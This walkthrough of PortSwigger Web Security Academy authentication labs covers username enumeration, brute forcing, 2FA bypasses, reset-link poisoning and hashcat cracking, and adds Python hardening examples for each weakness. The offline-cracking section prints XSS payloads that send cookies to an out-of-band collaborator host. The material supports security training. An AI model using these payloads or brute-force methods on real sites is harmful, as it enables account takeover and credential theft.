Walk-through of the Authentication lab on PortSwigger Web Security Academy.
- Apprentice – Username enumeration via different responses
- Apprentice – 2FA simple bypass
- Apprentice – Password reset broken logic
- Practitioner – Username enumeration via subtly different responses
- Practitioner – Username enumeration via response timing
- Practitioner – Broken brute-force protection, IP block
- Practitioner – Username enumeration via account lock
- Practitioner – 2FA broken logic
- Practitioner – Brute-forcing a stay-logged-in cookie
- Practitioner – Offline password cracking
- Practitioner – Password reset poisoning via middleware
- Practitioner – Password brute-force via password change
- Expert – Broken brute-force protection, multiple credentials per request
- Expert – 2FA bypass using a brute-force attack
Apprentice – Username enumeration via different responses
Use these lists for usernames and passwords.
- Click on My account and enter a user and password. A message will say Invalid username.
- Send the request to the Intruder module.
POST /login HTTP/1.1
...
username=whatever&password=whatever
Make the username the varying part.
username=§whatever§&password=whatever
- In the Payloads tab, paste the content of this list.
- In the Options tab, under Grep – Match, clear the list and add Invalid username.
- Click Start attack.
Click on column Invalid username to order it. Username arlington is not flagged.
username=arlington&password=whatever
Go back to the Positions tab and change the varying part to the password. Set username as arlington.
username=arlington&password=§whatever§
- In the Payloads tab, clear the list. Paste content from this list.
- In the Options tab, under Grep – Match, clear the list and add Incorrect password.
- Click Start attack.
Click on column Incorrect password to order it. Password freedom is not flagged.
username=arlington&password=freedom
Click on My account and enter credentials arlington/freedom to solve the lab.
Apprentice – 2FA simple bypass
- Click on My account and enter credentials carlos/montoya.
- This redirects to /login2, asking for a 4-digit security code. However, the session cookie is set.
- Remove /login2 from the URL. The user is logged in…
Apprentice – Password reset broken logic
- Click on My account and then on Forgot Password?. Enter user wiener.
- Click on My account and enter credentials wiener/peter. You will get the email address of the user.
- Click on Email client.
https://<YOUR LAB ID>.web-security-academy.net/forgot-password?temp-forgot-password-token=<token>
Open the password reset URL and intercept the requests.
POST /forgot-password?temp-forgot-password-token=<token> HTTP/1.1
...
temp-forgot-password-token=<token>&username=wiener&new-password-1=peter&new-password-2=peter
The username is in the parameters… change it to carlos and forward the request.
temp-forgot-password-token=<token>&username=carlos&new-password-1=peter&new-password-2=peter
Log out of the application. Click on My account and log in with credentials carlos/peter.
Practitioner – Username enumeration via subtly different responses
Use these lists for usernames and passwords.
- Click on My account and enter a user and password. A message will say Invalid username or password. (ending with a dot).
- Send the request to the Intruder module.
POST /login HTTP/1.1
...
username=whatever&password=whatever
Make the username the varying part.
username=§whatever§&password=whatever
- In the Payloads tab, paste the content of this list.
- In the Options tab, under Grep – Match, clear the list and add Invalid username or password. (ending with a dot).
- Click Start attack.
Click on column Invalid username or password. to order it. Username pi is not flagged.
username=pi&password=whatever
Go back to the Positions tab and change the varying part to the password. Set username as pi.
username=pi&password=§whatever§
- In the Payloads tab, clear the list. Paste content from this list.
- In the Options tab, under Grep – Match, clear the list and add Invalid username or password (NOT ending with a dot).
- Click Start attack.
Click on column Invalid username or password to order it. Password matthew is not flagged.
username=pi&password=matthew
Click on My account and enter credentials pi/matthew to solve the lab.
Practitioner – Username enumeration via response timing
Use these lists for usernames and passwords.
- Click on My account and enter a user and password. A message will say Invalid username or password. (ending with a dot).
- Send the request to the Intruder module.
POST /login HTTP/1.1
...
username=whatever&password=whatever
The IP gets blocked after a few tries.
Make the username the varying part and use a very long password (100 characters) to increase the processing delay. Add the X-Forwarded-For HTTP header to bypass the IP filter.
X-Forwarded-For: §dummy§
username=§whatever§&password=0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
Set Attack type to Pitchfork (multiple payloads).
Payload 1 (X-Forwarded-For) for spoofing the IP
- In the Payloads tab, select Payload set “1” and select Numbers.
- Set range From 1 To 100, Step to 1, Max fraction digits to 0.
Payload 2 (username)
- In the Payloads tab, select Payload set “2” and add user wiener.
- Paste the content of this list.
- Use a Resource pool with 1 maximum concurrent request.
- Click Start attack.
- In the attack window, click on the Columns menu, then on Response received and Response completed.
- Order column Response received.
Users azureuser and wiener have a Response received time of 1120+ ms, compared with around 300 ms for the other requests.
Brute-force password
Using the same request in the Intruder module, set username to azureuser and make the password the varying part. Leave the X-Forwarded-For header.
X-Forwarded-For: §dummy§
username=azureuser&password=§whatever§
- In the Payloads tab, select Payload set “2” and paste the content of this list.
- In the Options tab, under Grep – Match, clear the list and add Invalid username or password. (ending with a dot).
- Click Start attack.
Click on column Invalid username or password. to order it. Password moon is not flagged.
username=azureuser&password=moon
Click on My account and enter credentials azureuser/moon to solve the lab.
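The three enumeration labs above (different responses, subtly different responses, response timing) all come from the login handler doing something different when the username does not exist. The following is an added example of a login routine that removes those differences; it is not the lab's code and uses a constructed user store with PBKDF2 (the iteration count and 128-character limit are assumptions):

```python
import hashlib
import hmac
import os

# Constructed demo user store (not the lab's code): username -> (salt, PBKDF2 hash)
ITERATIONS = 20_000
MAX_PASSWORD_LEN = 128
ERR = "Invalid username or password."   # one message, identical punctuation, for every failure

def _pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def make_user(password: str):
    salt = os.urandom(16)
    return salt, _pbkdf2(password, salt)

USERS = {"wiener": make_user("peter")}

# Dummy credential used when the username does not exist, so the server does
# the same hashing work whether or not the account is real.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _pbkdf2("dummy-password-never-valid", _DUMMY_SALT)

_hash_calls = 0   # instrumentation only: lets a test show the work is uniform

def get_hash_calls() -> int:
    return _hash_calls

def login(username, password):
    """Return (ok, message). Every failure returns the same message and costs
    exactly one PBKDF2 computation, whichever field was wrong."""
    global _hash_calls
    # Reject non-string or oversized input before any work: this bounds the
    # hashing delay that the timing lab amplifies with a 100-character password.
    if not isinstance(username, str) or not isinstance(password, str):
        return False, ERR
    if len(password) > MAX_PASSWORD_LEN:
        return False, ERR
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    _hash_calls += 1
    candidate = _pbkdf2(password, salt)
    # Constant-time compare; the existence check is folded in after hashing,
    # so an unknown user costs the same as a known user with a wrong password.
    ok = hmac.compare_digest(candidate, stored) and username in USERS
    return (True, "OK") if ok else (False, ERR)
```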
Practitioner – Broken brute-force protection, IP block
- Click on My account and enter user carlos and any password. A message will say Incorrect password.
- Send the failed login request to the Intruder module.
POST /login HTTP/1.1
...
username=carlos&password=whatever
Make the password the varying part.
username=carlos&password=§whatever§
- In the Payloads tab, paste the content of this list.
- Use a resource pool of 1 maximum concurrent request.
- Click Start attack.
You will get the message You have made too many incorrect login attempts. Please try again in 1 minute(s) after 3 failed login requests. Click on My account and enter credentials wiener/peter. It works: a successful login resets the failure counter. Log out. We can use this behaviour to bypass the IP blocking.
Using a macro and a session handling rule
The goal is to issue a successful login request before each brute-force attempt.
- Click on the Settings menu.
- Under Macros, click Add.
- Select the successful login request.
- Give the macro a name (Login).
- Click OK.
- Under Session handling rules, click Add.
- In the Details tab:
- Under Rule description, enter a description like Intruder.
- Under Rule actions, click Add and select Run a macro. Select the macro Login and click OK.
- In the Scope tab:
- Under Tools scope, select Intruder and unselect the rest.
- Under URL scope, select Include all URLs.
- Click OK.
- Close the Settings window.
In the Intruder module, click on Start the attack (same request as before). Order the results by Status. A 302 Redirect is returned for the successful login request.
Click on My account and enter credentials carlos/asdfgh to solve the lab (password changes when doing the lab again).
Practitioner – Username enumeration via account lock
To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
- Click on My account and enter any username and password.
- Send the request to the Intruder.
- Make the username and password the varying parts.
- Set attack type to Cluster bomb.
POST /login HTTP/1.1
...
username=§whatever§&password=§whatever§
- In the Payloads tab:
- Payload set 1: use Simple list and copy this list of usernames.
- Payload set 2: use Simple list and enter numbers from 1 to 10. It will try 10 wrong passwords per username.
- In the Options tab, under Grep – Match, clear the list and add “Invalid username or password.”.
The username “application” will return this message:
You have made too many incorrect login attempts. Please try again in 1 minute(s).
- Click on My account and enter username “application” and any password.
- Send the request to the Intruder module.
- Make the password the varying part.
POST /login HTTP/1.1
...
username=application&password=§whatever§
- In the Payloads tab, use a Simple list and copy this list.
- In the Resource pool tab, use 10 concurrent requests.
- In the Options tab, under Grep – Match, clear the list and add “Invalid username or password.”.
- Start the attack.
- Order the results by Length. We find password “iloveyou”.
Wait one minute for the account to unlock and enter credentials application/iloveyou to solve the lab.
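The IP-block lab and the account-lock lab above show three weaknesses in the lab's protection: the block is keyed on a client-supplied X-Forwarded-For value, a successful login on any account clears the counter, and the lockout message itself reveals which usernames exist. As an added example (not the lab's code), a failure tracker that avoids all three; the threshold of 3 and the 60-second window mirror the lab and the trusted-proxy address is an assumption:

```python
import time
from collections import deque

class BruteForceGuard:
    """Failed-login tracking that closes the gaps the IP-block and account-lock
    labs exploit: the source address is the connection address (X-Forwarded-For
    is only honoured from a listed proxy), a successful login on one account
    does not clear the counters of another account or of the source address,
    and a locked account answers with the same message as a wrong password."""
    ERR = "Invalid username or password."

    def __init__(self, max_failures=3, window=60.0, trusted_proxies=()):
        self.max_failures = max_failures
        self.window = window                 # seconds a failure stays counted
        self.trusted_proxies = set(trusted_proxies)
        self._by_ip = {}                     # ip -> deque of failure timestamps
        self._by_user = {}                   # username -> deque of failure timestamps

    def client_ip(self, remote_addr, headers):
        """Only a trusted reverse proxy may supply X-Forwarded-For."""
        xff = headers.get("X-Forwarded-For")
        if xff and remote_addr in self.trusted_proxies:
            return xff.split(",")[-1].strip()   # the address the proxy itself appended
        return remote_addr

    def _recent(self, table, key, now):
        q = table.setdefault(key, deque())
        while q and now - q[0] > self.window:
            q.popleft()
        return q

    def attempt(self, remote_addr, headers, username, password_ok, now=None):
        """Record one login attempt; password_ok is the credential check result."""
        now = time.monotonic() if now is None else now
        ip_fail = self._recent(self._by_ip, self.client_ip(remote_addr, headers), now)
        user_fail = self._recent(self._by_user, username, now)
        blocked = (len(ip_fail) >= self.max_failures
                   or len(user_fail) >= self.max_failures)
        if blocked or not password_ok:
            # Count it against both the source and the account. A blocked attempt
            # with the right password is still refused and still counted.
            ip_fail.append(now)
            user_fail.append(now)
            return False, self.ERR
        user_fail.clear()        # success clears this account only; the IP window stays
        return True, "OK"
```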
Practitioner – 2FA broken logic
To solve the lab, access Carlos’s account page. You also have access to the email server to receive your 2FA verification code.
- Click on My account and log in with credentials wiener/peter.
- Enter any 4-digit security code as the second factor and click Login.
- Send the request to the Intruder module.
POST /login2 HTTP/1.1
...
Cookie: verify=wiener; session=<SESSION TOKEN>
...
mfa-code=1234
Change the username in the cookie from wiener to carlos and make the mfa-code the varying part.
POST /login2 HTTP/1.1
...
Cookie: verify=carlos; session=<SESSION TOKEN>
...
mfa-code=§1234§
- In the Payloads tab, select payload type Brute forcer, with Character set of “0123456789”, min length 4, max length 4.
- Leave the resource pool at 10 concurrent requests, otherwise the attack takes too long to complete.
- In the Options tab, under Grep – Match, clear the list and add “Incorrect security code”.
- Start the attack. The mfa-code is found.
mfa-code=0578
HTTP/1.1 302 Found
Location: /my-account
Set-Cookie: session=<SESSION TOKEN>; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 0
Right-click on the response in the Intruder, Request in browser -> In original session. Copy the URL in the browser to solve the lab. You will be logged in as carlos.
Practitioner – Brute-forcing a stay-logged-in cookie
This lab allows users to stay logged in even after they close their browser session. The cookie used to provide this functionality is vulnerable to brute-forcing. To solve the lab, brute-force Carlos’s cookie to gain access to his “My account” page.
Click on My account, select the Stay logged in checkbox and log in with credentials wiener/peter. Inspect requests.
HTTP/1.1 302 Found
Location: /my-account
Set-Cookie: stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw; Expires=Wed, 01 Jan 3000 01:00:00 UTC
Set-Cookie: session=<SESSION TOKEN>; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 0
Highlight the stay-logged-in value and open the Inspector (or send it to the Decoder). It is Base64-encoded. The first part is the username, the second part is the MD5 hash of the password (“peter”).
d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
wiener:51dc30ddc473d43a6011e9ebba6ca770
<username>:<password MD5 hash>
- Log out and click on My account.
- Send the request to the Intruder module.
- In the Payloads tab, use Simple list and copy this list.
- Under Payload Processing, add in this order:
- Hash: MD5
- Add prefix: “carlos:”
- Base64-encode
- In the Options tab, under Grep – Match, clear the list and add “Your username is:”.
- Start the attack.
GET /my-account HTTP/1.1
...
Cookie: session=<SESSION TOKEN>; stay-logged-in=§changeme§
...
Request 21 works, which gives the password 123321. This is not necessary to solve the lab but would be useful during a real pentest to log in directly.
Practitioner – Offline password cracking
This lab stores the user’s password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos’s stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the “My account” page.
Finding the XSS
- Click on a post (View post) and Submit any comment.
- Fuzz the parameters. The comment field is vulnerable to XSS.
POST /post/comment HTTP/1.1
...
postId=6&comment=<script>alert(1)</script>&name=whatever&email=whatever%40example.com&website=<@urlencode>http://whatever.example.com<@/urlencode>
Exploit the XSS to steal cookies
Submit one of these comments to steal the cookies:
<script>new Image().src="https://<BURP COLLABORATOR ID>.oastify.com?cookies="+document.cookie;</script>
<script>document.location='https://<BURP COLLABORATOR ID>.oastify.com?cookie='+document.cookie</script>
The Burp Collaborator receives a request.
GET /?cookies=secret=bERIRivWIH5J5JUWA8LfwybHabsoPwjr;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1
Host: ik6nd25qekzarsj70rfag69h58bzzpne.oastify.com
Connection: keep-alive
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.119 Safari/537.36
sec-ch-ua-platform:
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://0aae00090467eea5c049726b006300bd.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Send the stay-logged-in cookie value to the Decoder and decode it as Base64.
carlos:26323c16d5f4dabff3bb136f2460a943
The MD5 password hash is:
26323c16d5f4dabff3bb136f2460a943
Crack the password using Hashcat.
echo "26323c16d5f4dabff3bb136f2460a943" > hash.txt
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 0 -a 0 hash.txt --show
26323c16d5f4dabff3bb136f2460a943:onceuponatime
We found password “onceuponatime”. Click on My account and log in with credentials carlos/onceuponatime and click Delete account to solve the lab.
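Both the stay-logged-in lab and the offline cracking lab rest on the same cookie format, base64(username:md5(password)): anyone who sees the cookie gets a crackable hash. The following is an added example (not the lab's code) that decodes the two cookies shown above and contrasts them with a remember-me token that carries no password material; the store layout and token length are assumptions:

```python
import base64
import hashlib
import secrets

def decode_stay_logged_in(cookie: str):
    """Decode the lab cookie format: base64(username + ':' + md5hex(password))."""
    raw = base64.b64decode(cookie).decode()
    username, _, digest = raw.partition(":")
    return username, digest

def md5_hex(value: str) -> str:
    # Shown only to demonstrate why the cookie is crackable; never use MD5 for passwords.
    return hashlib.md5(value.encode()).hexdigest()

class RememberMeStore:
    """Hardened replacement: the cookie is a random token unrelated to the password.
    The server keeps only a hash of the token, so a leaked database does not
    leak valid cookies, and logout or a password change revokes every token."""
    def __init__(self):
        self._tokens = {}   # sha256(token) -> username

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, username: str) -> str:
        token = secrets.token_urlsafe(32)       # 256 random bits: no wordlist can reach it
        self._tokens[self._key(token)] = username
        return token

    def resolve(self, token: str):
        # Lookup is by hash of the token, so the stored value is never the cookie itself.
        return self._tokens.get(self._key(token))

    def revoke(self, username: str) -> int:
        """Invalidate all of a user's tokens (on logout, password change or cookie theft)."""
        stale = [k for k, u in self._tokens.items() if u == username]
        for k in stale:
            del self._tokens[k]
        return len(stale)
```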
Practitioner – Password reset poisoning via middleware
See Password reset poisoning (PortSwigger).
This lab is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos’s account.
- Click on My account.
- Click on Forgot password.
- Enter username wiener.
- Click on Go to exploit server and on Email client.
POST /forgot-password HTTP/1.1
...
username=wiener
Hello!
Please follow the link below to reset your password.
https://<LAB ID>.web-security-academy.net/forgot-password?temp-forgot-password-token=VFch8il4tlXaoWhN7AhhVyD582ZUQF59
Thanks,
Support team
Send a Forgot password request for carlos, adding the X-Forwarded-Host header.
Do NOT add http or https in front of the Burp Collaborator URL.
POST /forgot-password HTTP/1.1
...
X-Forwarded-Host: <BURP COLLABORATOR ID>.oastify.com
username=carlos
The Burp Collaborator receives a request.
GET /forgot-password?temp-forgot-password-token=rxKkJyALoBVWQxFYhPEckYVK3nV8YwS9 HTTP/1.1
Access the URL to reset carlos’ password.
https://<LAB ID>.web-security-academy.net/forgot-password?temp-forgot-password-token=rxKkJyALoBVWQxFYhPEckYVK3nV8YwS9
Click on My account, and log in with credentials carlos/whatever.
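The middleware lab above works because the reset link is built from a request header, and the earlier "Password reset broken logic" lab works because the account to update is read from a form field. As an added example (not the lab's code), a reset flow that takes the origin from configuration and the account from the token; the placeholder origin, the 15-minute lifetime and the constructed user store are assumptions:

```python
import hashlib
import secrets
import time

# The public origin is configuration, never read from Host or X-Forwarded-Host.
CANONICAL_ORIGIN = "https://<LAB ID>.web-security-academy.net"   # placeholder
TOKEN_TTL = 15 * 60                                                # seconds

class PasswordReset:
    """Reset flow that closes both lab flaws: the emailed link is built from the
    configured origin (so a poisoned X-Forwarded-Host cannot redirect the token
    to an attacker host), and the account to update is looked up from the token
    on the server (so a 'username' form field is never trusted)."""
    def __init__(self, users):
        self.users = users          # username -> password, constructed demo store
        self._tokens = {}           # sha256(token) -> (username, expiry)

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def request_reset(self, username, headers, now=None):
        """Return the link that would be mailed, or None for an unknown user.
        The HTTP response to the caller should be identical in both cases."""
        now = time.time() if now is None else now
        if username not in self.users:
            return None
        token = secrets.token_urlsafe(24)
        self._tokens[self._key(token)] = (username, now + TOKEN_TTL)
        # headers["Host"] and headers.get("X-Forwarded-Host") are deliberately unused
        return f"{CANONICAL_ORIGIN}/forgot-password?temp-forgot-password-token={token}"

    def complete_reset(self, form, now=None):
        """form mirrors the lab's POST body; any 'username' field in it is ignored."""
        now = time.time() if now is None else now
        new1, new2 = form.get("new-password-1"), form.get("new-password-2")
        if not new1 or new1 != new2:
            return False
        entry = self._tokens.pop(self._key(form.get("temp-forgot-password-token", "")), None)
        if entry is None:
            return False               # unknown, or already used (single use)
        username, expiry = entry
        if now > expiry:
            return False
        self.users[username] = new1
        return True
```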
Practitioner – Password brute-force via password change
To solve the lab, use the list of candidate passwords to brute-force Carlos’s account and access his “My account” page.
- Click on My account and log in with credentials wiener/peter.
- Enter a wrong password as the current password, and enter 2 different passwords as the new password. The application responds with “Current password is incorrect”.
- Send the request to the Repeater module.
POST /my-account/change-password HTTP/1.1
...
username=wiener&current-password=notmypassword&new-password-1=whatever1&new-password-2=whatever2
Change the username to carlos and send the request. The application responds with “Current password is incorrect”.
POST /my-account/change-password HTTP/1.1
...
username=carlos&current-password=notmypassword&new-password-1=whatever1&new-password-2=whatever2
- Send the request to the Intruder module.
- Make the password the varying part.
POST /my-account/change-password HTTP/1.1
...
username=carlos&current-password=§notmypassword§&new-password-1=whatever1&new-password-2=whatever2
- In the Payloads tab, use the Simple list and copy this list.
- In the Options tab, under Grep – Match, clear the list and add “Current password is incorrect”.
- Click Start attack.
Password “monitoring” responds with “New passwords do not match”. Log in using credentials carlos/monitoring to solve the lab.
Expert – Broken brute-force protection, multiple credentials per request
To solve the lab, brute-force Carlos’s password, then access his account page.
- Click on My account and enter username carlos with any password.
- Send the request to the Repeater module.
POST /login HTTP/1.1
...
{"username":"carlos","password":"whatever"}
Modify the request so the server accepts multiple passwords.
POST /login HTTP/1.1
...
{"username":"carlos","password":["whatever1","whatever2"]}
Generate the list of passwords in JSON using this list. Put the list in wl.txt and generate the JSON array elements (reading line by line so spaces and % in passwords are preserved; drop the trailing comma from the output):
while IFS= read -r pass; do printf '"%s",' "$pass"; done < wl.txt
- Intercept requests in Burp Suite.
- Click on My account and enter username carlos with any password.
- Modify the request with the multiple passwords.
- Forward the request. The server responds with a 302 Redirect.
POST /login HTTP/1.1
...
{"username":"carlos","password":["123456","password","12345678","qwerty","123456789","12345","1234","111111","1234567","dragon","123123","baseball","abc123","football","monkey","letmein","shadow","master","666666","qwertyuiop","123321","mustang","1234567890","michael","654321","superman","1qaz2wsx","7777777","121212","000000","qazwsx","123qwe","killer","trustno1","jordan","jennifer","zxcvbnm","asdfgh","hunter","buster","soccer","harley","batman","andrew","tigger","sunshine","iloveyou","2000","charlie","robert","thomas","hockey","ranger","daniel","starwars","klaster","112233","george","computer","michelle","jessica","pepper","1111","zxcvbn","555555","11111111","131313","freedom","777777","pass","maggie","159753","aaaaaa","ginger","princess","joshua","cheese","amanda","summer","love","ashley","nicole","chelsea","biteme","matthew","access","yankees","987654321","dallas","austin","thunder","taylor","matrix","mobilemail","mom","monitor","monitoring","montana","moon","moscow"]}
We are now logged in as user carlos.
Expert – 2FA bypass using a brute-force attack
You have already obtained a valid username and password, but do not have access to the user’s 2FA verification code. To solve the lab, brute-force the 2FA code and access Carlos’s account page.
As the verification code will reset while you’re running your attack, you may need to repeat this attack several times before you succeed. This is because the new code may be a number that your current Intruder attack has already attempted.
- Click on My account and enter credentials carlos/montoya.
- A 4-digit security code is required. Enter any code and send the request to the Intruder module.
- Make the mfa-code the varying part.
POST /login2 HTTP/1.1
...
csrf=Kca8PZvjWjRjDyVlAmYtBvtjsGCF2ITX&mfa-code=§1234§
- In the Payloads tab, use Numbers from 0 to 9999, step 1, min/max integer digits to 4, max fraction digits to 0.
- In the Resource Pool tab, use 1 concurrent request.
- In the Options tab, under Grep – Match, clear the list and add “Incorrect security code”.
- Do NOT start the attack yet.
Create a macro
- Click on Settings.
- In Sessions, under Macros, click Add.
- Select requests: GET /login, POST /login, GET /login2
- Click OK. Click Test macro. It should return the page asking for MFA.
Create a session handling rule
- In Sessions, under Session handling rules, click Add.
- In the Details tab, under Rule actions, click Add.
- Select the macro and click OK.
- In the Scope tab, under Tools Scope, select the Intruder and unselect the others.
- Under URL Scope, select Include all URLs.
- Click OK and close the Settings menu.
Brute-force MFA
In the Intruder, click Start attack. It will be super slow. Be patient. One request will return 302 Redirect. Right-click on the request, and click Show response in browser. You will be logged in as carlos.
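The three 2FA labs (simple bypass, broken logic, brute-force) each exploit a different gap in how the second factor is tracked. As an added example (not the lab's code), a server-side session state machine that closes all three; the attempt limit of 3, the in-memory session table and the constructed user store are assumptions:

```python
import secrets

class TwoFactorSession:
    """Server-side login state for the 2FA labs. The session becomes
    'authenticated' only after the code check (no bypass by skipping /login2);
    the code is checked against the user recorded in the session, not a
    user-controlled 'verify' cookie; and the pending login is discarded after
    MAX_ATTEMPTS wrong guesses, so a 4-digit code cannot be searched exhaustively."""
    MAX_ATTEMPTS = 3

    def __init__(self, users):
        self.users = users        # username -> password, constructed demo store
        self.sessions = {}        # session id -> {"user", "stage", "code", "attempts"}
        self.outbox = []          # (username, code) pairs; stands in for the email client

    def login(self, username, password):
        """First factor. Returns a session id that is NOT yet authenticated."""
        if self.users.get(username) != password:
            return None
        sid = secrets.token_urlsafe(16)
        code = f"{secrets.randbelow(10_000):04d}"
        self.sessions[sid] = {"user": username, "stage": "pending_2fa",
                              "code": code, "attempts": 0}
        self.outbox.append((username, code))
        return sid

    def verify_code(self, sid, code):
        """Second factor. The user is taken from the session, never from the request."""
        s = self.sessions.get(sid)
        if s is None or s["stage"] != "pending_2fa":
            return False
        if secrets.compare_digest(s["code"], str(code)):
            s["stage"], s["code"] = "authenticated", None
            return True
        s["attempts"] += 1
        if s["attempts"] >= self.MAX_ATTEMPTS:
            del self.sessions[sid]     # too many guesses: the login must start over
        return False

    def my_account(self, sid):
        """Returns the page owner, or None (the app would redirect to /login2 or /login)."""
        s = self.sessions.get(sid)
        if s is None or s["stage"] != "authenticated":
            return None
        return s["user"]
```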